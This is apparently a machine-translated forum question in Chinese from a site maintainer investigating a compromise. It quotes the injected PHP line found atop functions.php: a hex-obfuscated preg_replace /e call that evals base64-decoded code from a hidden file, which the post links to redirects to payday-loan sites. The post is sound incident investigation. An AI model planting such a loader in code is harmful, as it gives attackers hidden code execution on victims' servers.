一些我如何设法在我帮助维护的网站上以非常具体的方式受到攻击,我正在调查服务器是否被直接黑客攻击或有人能够以某种方式注入恶意脚本。
首先有人设法得到这个:
@preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");
在文件注释之后进入 PHP 文件的最顶部。这和其他代码最相似的作用是 301 将未通过浏览器连接到该网站的任何人重定向到发薪日贷款网站。这只影响了我的主页,所有其他页面都很好。
可能有更多代码要做,但这是最令人困惑的部分,因为此代码位于一个名为的文件中,该文件functions.php
仅包含在内,但它是 index.php(我的主页)中包含的第一个文件。
让我完全困惑的是,有人如何在不直接入侵服务器的情况下获得代码,那里没有使用用户输入,它实际上位于整个文件之上。除了这个注入的代码和上面的一些注释之外,什么都没有。
我的信封是:
琴图
PHP 5.2.14-pl0-gentoo
阿帕奇 2
我检查了服务器日志,但是,像往常一样,他们删除了他们的踪迹。
正如您所注意到的,这也部分是服务器问题,但 atm 它是 90% 的编程问题,所以我想我会先在这里问它。
PHP 中是否存在任何可能导致此问题的漏洞?
如果您需要澄清,请告诉我。
编辑
我有一个分期系统,它有一个
- 工作
- 预习
- 居住
我知道这与 SQL 注入无关,因为如果我切换实时和预览文件夹,我不会遇到任何问题。我也不将 gentoo 密码存储在数据库或应用程序中,您只能连接到小范围 IP 地址中的服务器,除了 Apache,它接受来自任何主机的 80 和 443 连接。另外,我在站点中使用 SQL 转义类和方法(PDO、MySQLi 等)。
所以这个问题(更令人困惑)只位于我网站的一个副本中,而不是数据库或任何东西。